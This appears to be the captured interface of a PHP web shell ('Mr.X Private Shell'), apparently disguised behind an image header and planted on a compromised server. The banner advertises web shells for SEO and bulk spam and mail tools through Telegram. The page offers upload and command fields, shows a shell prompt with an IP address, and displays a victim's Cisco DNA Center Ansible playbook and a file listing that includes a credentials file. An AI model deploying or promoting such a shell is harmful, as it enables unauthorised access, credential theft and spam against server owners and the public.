����JFIF��������� Mr.X
  
  __  __    __   __  _____      _            _          _____ _          _ _ 
 |  \/  |   \ \ / / |  __ \    (_)          | |        / ____| |        | | |
 | \  / |_ __\ V /  | |__) | __ ___   ____ _| |_ ___  | (___ | |__   ___| | |
 | |\/| | '__|> <   |  ___/ '__| \ \ / / _` | __/ _ \  \___ \| '_ \ / _ \ | |
 | |  | | |_ / . \  | |   | |  | |\ V / (_| | ||  __/  ____) | | | |  __/ | |
 |_|  |_|_(_)_/ \_\ |_|   |_|  |_| \_/ \__,_|\__\___| |_____/|_| |_|\___V 2.1
 if you need WebShell for Seo everyday contact me on Telegram
 Telegram Address : @jackleet
        
        
For_More_Tools: Telegram: @jackleet | Bulk Smtp support mail sender | Business Mail Collector | Mail Bouncer All Mail | Bulk Office Mail Validator | Html Letter private



Upload:

Command:

deexcl@216.73.217.71: ~ $
---
- hosts: dnac_servers
  vars_files:
    - credentials.yml
  gather_facts: false
  tasks:
    - name: Create an application
      cisco.dnac.applications:
        dnac_host: "{{ dnac_host }}"
        dnac_username: "{{ dnac_username }}"
        dnac_password: "{{ dnac_password }}"
        dnac_verify: "{{ dnac_verify }}"
        dnac_debug: "{{ dnac_debug }}"
        state: present
        payload:
          - name: itunes-video
            networkApplications:
              - id: d4658954-ef8e-4eb9-a663-d53e3f4de325
                appProtocol: tcp
                applicationSubType: NONE
                applicationType: DEFAULT
                categoryId: edc1f53c-d89d-4e8d-a23b-6148e3857504
                displayName: "12608"
                engineId: "13"
                helpString: iTunes video streaming
                longDescription: >-
                  iTunes is a media player and media library application developed by Apple Inc. It is used to play, download, and organize digital
                  audio and video on personal computers running the OS X and Microsoft Windows operating systems. Through the iTunes Store, users
                  can purchase and
                  download music, music videos, television shows, audiobooks, podcasts, movies, etc. on their MAC/ Win PC/ iDevices running iTunes.
                  iTunes-video refers to all video streaming media services generated by iTunes such as: play movies, TV shows, videocasts, video, etc.
                name: itunes-video
                popularity: "10"
                rank: "65535"
                selectorId: "572"
                trafficClass: MULTIMEDIA_STREAMING
            networkIdentity:
              - id: 4babbfcf-c5b7-4105-8954-1ee3a6097753
                displayName: "1461196"
                lowerPort: "0"
                ports: "80"
                protocol: TCP
                upperPort: "0"
            applicationSet:
              idRef: d31b81a3-a599-4d0c-bb6d-42bbdd0e7889
      register: application_result

    - name: Get task info
      cisco.dnac.task_info:
        dnac_host: "{{ dnac_host }}"
        dnac_username: "{{ dnac_username }}"
        dnac_password: "{{ dnac_password }}"
        dnac_verify: "{{ dnac_verify }}"
        taskId: "{{ application_result.dnac_response.response.taskId }}"
      when:
        - application_result.dnac_response is defined
        - application_result.dnac_response.response is defined
        - application_result.dnac_response.response.taskId is defined
      register: task_result

    - name: Show new application_set
      ansible.builtin.debug:
        msg: "{{ application_result }}"
      when:
        - application_result is defined

    - name: Show retrieved task
      ansible.builtin.debug:
        msg: "{{ task_result.dnac_response.response }}"
      when:
        - task_result is defined
        - task_result.dnac_response is defined

Filemanager

Name Type Size Permission Actions
files Folder 0755
application_set_info.yml File 522 B 0644
application_sets.yml File 1.36 KB 0644
applications.yml File 2.86 KB 0644
authentication_import.yml File 579 B 0644
command_runner_run_command.yml File 1.2 KB 0644
configuration_template_version_create.yml File 1.65 KB 0644
credentials.template File 150 B 0644
credentials.yml File 148 B 0644
device_details.yml File 1.61 KB 0644
discovery.yml File 4.36 KB 0644
download_device_cmd_runner_output.yml File 2.56 KB 0644
global_credentials.yml File 1.11 KB 0644
global_credentials_info.yml File 1.27 KB 0644
global_pool.yml File 779 B 0644
hosts File 26 B 0644
image_details.yml File 609 B 0644
import_image_file.yml File 684 B 0644
network_device_custom_prompt_info.yml File 655 B 0644
network_device_info.yml File 1.13 KB 0644
network_device_update_role.yml File 1.57 KB 0644
pnp_device.yml File 2.43 KB 0644
reports_executions_info.yml File 681 B 0644
reserve_ip_subpool.yml File 1.34 KB 0644
sda_fabric.yml File 605 B 0644
sda_fabric_site.yml File 1.06 KB 0644
sda_virtual_network_v2.yml File 1.01 KB 0644
tag.yml File 4.06 KB 0644
template.yml File 727 B 0644
template_pnp_intent.yml File 1.96 KB 0644
test_swim_module.yml File 1.33 KB 0644
wireless_enterprise_ssid.yml File 1.14 KB 0644